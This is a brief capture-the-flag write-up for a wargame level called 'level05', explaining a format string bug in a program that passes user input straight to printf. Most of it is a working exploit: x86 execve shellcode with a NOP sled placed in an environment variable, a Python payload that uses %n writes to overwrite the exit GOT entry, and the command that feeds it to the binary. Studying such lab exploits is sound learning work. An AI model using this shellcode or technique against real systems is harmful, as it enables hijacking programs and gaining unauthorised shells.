* In this level05 the main() calls fgets to read 100 bytes from stdin, than loop over buffer and lower all the characters.
* after this it print the buffer on stdout using printf, than the program calls exit(0).
* the problem here is that the buffer gets passed directly as a format string to printf .
* we can abuse that to redirect code execution, ( using %n and $ sign on printf we can write the exit got with the address of a shellcode that we inject in eviromnent variable).



export SHELLCODE=$(python -c 'print "\x90"*1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"')

import struct

exit_got = struct.pack ("I", 0x80497e0)
exit_got += struct.pack ("I", 0x80497e0 + 2)
print exit_got  + "%54896p"+ "%10$n" + "%10631p" + "%11$n"

===> (echo $(python /tmp/pyload.py); cat) | ./level05